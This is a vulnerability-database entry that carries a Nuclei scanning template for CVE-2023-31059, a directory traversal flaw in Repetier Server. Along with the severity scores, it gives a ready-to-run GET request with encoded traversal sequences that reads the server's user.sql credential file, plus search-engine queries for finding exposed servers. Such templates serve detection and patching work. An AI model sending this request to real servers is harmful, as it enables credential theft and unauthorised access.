Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-31059
HistoryMay 09, 2023 - 4:00 p.m.

Repetier Server - Directory Traversal

2023-05-0916:00:06
ProjectDiscovery
github.com
4
cve2023
repetier
lfi
directorytraversal
securityvulnerability

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

8 High

AI Score

Confidence

High

0.01 Low

EPSS

Percentile

83.5%

Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
id: CVE-2023-31059

info:
  name: Repetier Server - Directory Traversal
  author: parthmalhotra,pdresearch
  severity: high
  description: |
    Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
  impact: |
    An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server.
  reference:
    - https://cybir.com/2023/cve/poc-repetier-server-140/
    - https://www.repetier-server.com/download-repetier-server/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-31059
    cwe-id: CWE-22
    epss-score: 0.00878
    epss-percentile: 0.8245
    cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: repetier-server
    product: repetier-server
    shodan-query:
      - title:"Repetier-Server"
      - http.title:"repetier-server"
    fofa-query:
      - title="Repetier-Server"
      - title="repetier-server"
    google-query: intitle:"repetier-server"
  tags: cve2023,cve,repetier,lfi,repetier-server

http:
  - method: GET
    path:
      - "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - 53514C69746520666F726D6174203300

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dbe4ace80cde1e29fc29ac4d1e6f074aeae9ff82f6623c1684d84ae94fe4388a022100b484e439856284c6477913f83350c973bd6c7885acf29be352872757737659fb:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

8 High

AI Score

Confidence

High

0.01 Low

EPSS

Percentile

83.5%

Related for NUCLEI:CVE-2023-31059